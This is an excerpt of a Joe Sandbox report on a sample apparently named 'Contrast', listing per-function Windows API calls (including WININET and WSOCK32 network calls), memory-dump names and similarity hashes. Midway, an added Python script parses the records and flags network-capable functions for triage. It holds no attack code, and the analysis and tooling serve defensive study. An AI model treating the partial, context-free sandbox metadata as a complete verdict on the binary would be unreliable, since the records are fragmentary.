                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                                                                        • String ID: edit
                                                                                                                                        • API String ID: 2978978980-2167791130
                                                                                                                                        • Opcode ID: d9de9b5fbd4aa7bc379721b355fa20268967f98fde272a874d209020bda563fd
                                                                                                                                        • Instruction ID: 52f052a8ede24182b5b754325078b2fff756ec7349eed038184bbd9813aae8ee
                                                                                                                                        • Opcode Fuzzy Hash: d9de9b5fbd4aa7bc379721b355fa20268967f98fde272a874d209020bda563fd
                                                                                                                                        • Instruction Fuzzy Hash: 31116671510209ABEF108E64AC84EFB3FAAFB15368F105714F964931E4C735DC98AB60
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005731C9
                                                                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005731E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoItemMenu_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 2223754486-4108050209
                                                                                                                                        • Opcode ID: e2b7dcf3483061f125628e30f1bade5436ac2459cf07b2666f3a409fbe11e98f
                                                                                                                                        • Instruction ID: e2ff7fca19b98539e35d3cd005e2a911fc09381b56794aad36697995c358bcb2
                                                                                                                                        • Opcode Fuzzy Hash: e2b7dcf3483061f125628e30f1bade5436ac2459cf07b2666f3a409fbe11e98f
                                                                                                                                        • Instruction Fuzzy Hash: B4113B7590221AEBDB20DB98EC05B9D7FB8BB05320F448122E80DA7290D730EF05FB90
                                                                                                                                        APIs
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0051351D
                                                                                                                                        • DestroyWindow.USER32(?,?,00524E61), ref: 00513576
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteDestroyObjectWindow
                                                                                                                                        • String ID: hZ
                                                                                                                                        • API String ID: 2587070983-3824762921
                                                                                                                                        • Opcode ID: 4ef1ec285180a250ec6b43c6eb8c4e0beb604ce8557768153c4eec3a776a22c6
                                                                                                                                        • Instruction ID: 97c3a81749b54cf9ba7c78f48f1aaad508b2ed3a490ae5fe738ccf7d04b5e65f
                                                                                                                                        • Opcode Fuzzy Hash: 4ef1ec285180a250ec6b43c6eb8c4e0beb604ce8557768153c4eec3a776a22c6
                                                                                                                                        • Instruction Fuzzy Hash: A721337060A115CFEB34DB18D868A653BE2FB58714B05455BE406972A4E730DE88FB51
                                                                                                                                        APIs
                                                                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005828F8
                                                                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00582921
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$OpenOption
                                                                                                                                        • String ID: <local>
                                                                                                                                        • API String ID: 942729171-4266983199
                                                                                                                                        • Opcode ID: c0c87c25dde9849725473dc06f64673b7b02d4d34c7c576744babcbc54661931
                                                                                                                                        • Instruction ID: 6ae3d2067412b8f2339fc396dbcd4d6f236fe070af499e046b73022c32a087f0
                                                                                                                                        • Opcode Fuzzy Hash: c0c87c25dde9849725473dc06f64673b7b02d4d34c7c576744babcbc54661931
                                                                                                                                        • Instruction Fuzzy Hash: 7B11E070501325BAEB249F518C89EBBFFACFF16351F10852AF95562040E3706894EBE0
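The per-function records above (API calls with their import module and reference address, memory-dump provenance, and similarity hashes) are much easier to hunt through once they are structured. What follows is an added example, not Joe Sandbox's own code: a parser for this record layout plus a triage pass that flags records calling into WININET or WSOCK32 and decodes the InternetSetOptionW option argument (0x32 is INTERNET_OPTION_CONNECTED_STATE in wininet.h). SAMPLE is constructed by copying two records from this page, the second cut off before its Similarity section exactly as it is on the page; the names parse_records, triage, NETWORK_MODULES and WININET_OPTIONS are this example's own.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity) and flag functions that can reach the network.
Added example, not Joe Sandbox code; SAMPLE is constructed from records on this page."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
NETWORK_MODULES = {"WININET", "WSOCK32", "WS2_32", "WINHTTP"}   # import modules implying network reach
WININET_OPTIONS = {0x32: "INTERNET_OPTION_CONNECTED_STATE"}       # dwOption value from wininet.h

# Matches "Name.MODULE(args), ref: ADDR" and the CRT form "_memmove.LIBCMT ref: ADDR",
# either one optionally prefixed with "Part of subcall function ADDR: ".
API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
                    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str]   # address of the calling function for "Part of subcall" entries

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    dumps: List[Tuple[str, str]] = field(default_factory=list)   # (kind, .sdmp name)
    similarity: dict = field(default_factory=dict)
    complete: bool = False   # a Similarity section was seen (a truncated record has none)

def parse_records(text: str) -> List[FunctionRecord]:
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":                  # every record opens with an APIs header
                current = FunctionRecord()
                records.append(current)
            section = line
            if section == "Similarity" and current is not None:
                current.complete = True
            continue
        if current is None:                     # text before the first record
            continue
        item = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section in ("Memory Dump Source", "Similarity"):
            kind, _, value = item.partition(": ")
            value = value.replace("Download File", "").strip()   # strip web-page link residue
            if section == "Memory Dump Source":
                current.dumps.append((kind, value))
            else:
                current.similarity[kind] = value
    return records

def triage(records: List[FunctionRecord]) -> List[dict]:
    """One summary per record: MODULE!API names, decoded InternetSetOptionW option,
    whether any call can reach the network, and whether the record was complete."""
    out = []
    for r in records:
        options = []
        for a in r.apis:
            if a.name == "InternetSetOptionW" and len(a.args) >= 2 and a.args[1] != "?":
                options.append(WININET_OPTIONS.get(int(a.args[1], 16), a.args[1]))
        out.append({"apis": [f"{a.module}!{a.name}" for a in r.apis],
                    "network": any(a.module.upper() in NETWORK_MODULES for a in r.apis),
                    "options": options,
                    "string_id": r.similarity.get("String ID"),
                    "complete": r.complete})
    return out

# Constructed sample: two records copied from this page, the second truncated.
SAMPLE = """\
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 005828F8
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00582921
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
APIs
  • Part of subcall function 005886E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0058849D,?,00000000,?,?), ref: 005886F7
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
• htons.WSOCK32(00000000,?,00000000), ref: 005884DD
"""

if __name__ == "__main__":
    for row in triage(parse_records(SAMPLE)):
        print(row)
```

Feed the parser the text of the whole report section rather than SAMPLE to get one summary per function; records that the page cuts off come back with complete set to False so they are not mistaken for functions with no strings or hashes.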
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _wcscmp
• String ID: 0.0.0.0$L,Z
• API String ID: 856254489-1023806
• Opcode ID: 389d1da3fd65df583f247c9436a0266841ff9564176a79f7ff7ed57753cf48ed
• Instruction ID: c4cd48d4801dc618b0671e1199013954a66c0f5246a0700309a107c686327832
• Opcode Fuzzy Hash: 389d1da3fd65df583f247c9436a0266841ff9564176a79f7ff7ed57753cf48ed
• Instruction Fuzzy Hash: AE11B2356002059FDB04EE14D985EADBFB8BF85720F50C449FA095B3A1DA30ED82DB60
APIs
  • Part of subcall function 005886E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0058849D,?,00000000,?,?), ref: 005886F7
• inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
• htons.WSOCK32(00000000,?,00000000), ref: 005884DD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                        • String ID: 255.255.255.255
                                                                                                                                        • API String ID: 2496851823-2422070025
                                                                                                                                        • Opcode ID: 033e7a0b587526488aa8d90f4d23e882e87b5188e9ae2fccf7057bfed3bd13d4
                                                                                                                                        • Instruction ID: aaaba900be6e4105d9d8c71051f347f00cd517c8958f63a74f1b7646ab6d0dd4
                                                                                                                                        • Opcode Fuzzy Hash: 033e7a0b587526488aa8d90f4d23e882e87b5188e9ae2fccf7057bfed3bd13d4
                                                                                                                                        • Instruction Fuzzy Hash: 3B11C23510021AABDF10AF64D846FBEBB64FF55324F10451AED11672D1DB31A804CB95
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00569A2B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                                        • Opcode ID: 7e7fa999915de4a85f9a6a1e3a2be651f3c3883ec59b2115dec9b9f843f27d33
                                                                                                                                        • Instruction ID: 5e2380cd2e07f66f35c37a650f26c1c6bd555c361c245d032eb533418f143c68
                                                                                                                                        • Opcode Fuzzy Hash: 7e7fa999915de4a85f9a6a1e3a2be651f3c3883ec59b2115dec9b9f843f27d33
                                                                                                                                        • Instruction Fuzzy Hash: 6401F571A41129AB8B14FBA4CC55DFE7FADFFA2320B000619F861932C1DB305D089690
                                                                                                                                        APIs
                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0051BC07
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • _wcscat.LIBCMT ref: 00553593
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FullNamePath_memmove_wcscat
                                                                                                                                        • String ID: s]
                                                                                                                                        • API String ID: 257928180-4126774240
                                                                                                                                        • Opcode ID: a0344d8a70e7d796f98ca3a546a977f2e0325693a20b5455f04948ba73999270
                                                                                                                                        • Instruction ID: 0d08ee836906c27f240a8b1865cee4c87b8e13009728cb0806dfdc07abaf1fd2
                                                                                                                                        • Opcode Fuzzy Hash: a0344d8a70e7d796f98ca3a546a977f2e0325693a20b5455f04948ba73999270
                                                                                                                                        • Instruction Fuzzy Hash: 7011A53090421A97DB11EBA4984AEDE7FE8FF49350F1004A6B945D7290EF709BC49B91
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __fread_nolock_memmove
                                                                                                                                        • String ID: EA06
                                                                                                                                        • API String ID: 1988441806-3962188686
                                                                                                                                        • Opcode ID: 65a3c646f2df640a9d8039a3bf17d9fe5966964b837d7609bb8d06c67001ed5f
                                                                                                                                        • Instruction ID: dcefc3cb201a3436d0737c69294bc33808d485068807ad25ba1c9fc8daf53fd7
                                                                                                                                        • Opcode Fuzzy Hash: 65a3c646f2df640a9d8039a3bf17d9fe5966964b837d7609bb8d06c67001ed5f
                                                                                                                                        • Instruction Fuzzy Hash: 3E01F9728042587EDB18C6A8C85AEFEBFF8AB01301F00459EF552D2181E5B5E6048760
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00569923
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                                        • Opcode ID: ee5a36db690c1eee23e348e358d1b9b906d82bf5e7dbd132b48b3f49f8a417d1
                                                                                                                                        • Instruction ID: 6dffae7d538d3af9f975d482cccd58ed4028ad8d6a5ff195db3824106367d5c6
                                                                                                                                        • Opcode Fuzzy Hash: ee5a36db690c1eee23e348e358d1b9b906d82bf5e7dbd132b48b3f49f8a417d1
                                                                                                                                        • Instruction Fuzzy Hash: 4A018475A411196BCB14FBA4D956EFF7FACBFA6340F140119B841A32C1DA205E0896F1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
                                                                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 005699A6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                        • API String ID: 372448540-1403004172
                                                                                                                                        • Opcode ID: 6a51eb7ee10da88cd3df4bc887df973d4a44747596c631385e932ddf83d28325
                                                                                                                                        • Instruction ID: 24836071dcb20ade59d923001946690cb61510b69b6f43964670a2b0c6ac4422
                                                                                                                                        • Opcode Fuzzy Hash: 6a51eb7ee10da88cd3df4bc887df973d4a44747596c631385e932ddf83d28325
                                                                                                                                        • Instruction Fuzzy Hash: D701A776A411196BCB14FBA4CA56EFF7FACBF62340F140019B845B32C1DA244F0896B1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __calloc_crt
                                                                                                                                        • String ID: @b]
                                                                                                                                        • API String ID: 3494438863-3452596414
                                                                                                                                        • Opcode ID: 5cf05835313de6e3632326157b5fee08a7c25cc7bc7b2e3fa6ad736baa9d4918
                                                                                                                                        • Instruction ID: 6626671836a9441c6cfb1e87faba956ae6c916d7506a71ce14774ab60306d0cd
                                                                                                                                        • Opcode Fuzzy Hash: 5cf05835313de6e3632326157b5fee08a7c25cc7bc7b2e3fa6ad736baa9d4918
                                                                                                                                        • Instruction Fuzzy Hash: E1F04FB530A356ABE7388B69FC057A52F95F768724F50986BF100CB294F73088855694
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 005688A0
  • Part of subcall function 00533588: _doexit.LIBCMT ref: 00533592
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00550091
  • Part of subcall function 0058C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,0055027A,?), ref: 0058C6E7
  • Part of subcall function 0058C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C6F9
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00550289
Strings
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
APIs
• DestroyIcon.USER32(,z]0z],005D7A2C,005D7890,?,00525A53,005D7A2C,005D7A30,?,00000004), ref: 00525823
Strings
Similarity
• API ID: DestroyIcon
• String ID: ,z]0z]$SZR,z]0z]
• API String ID: 1234817797-3034943861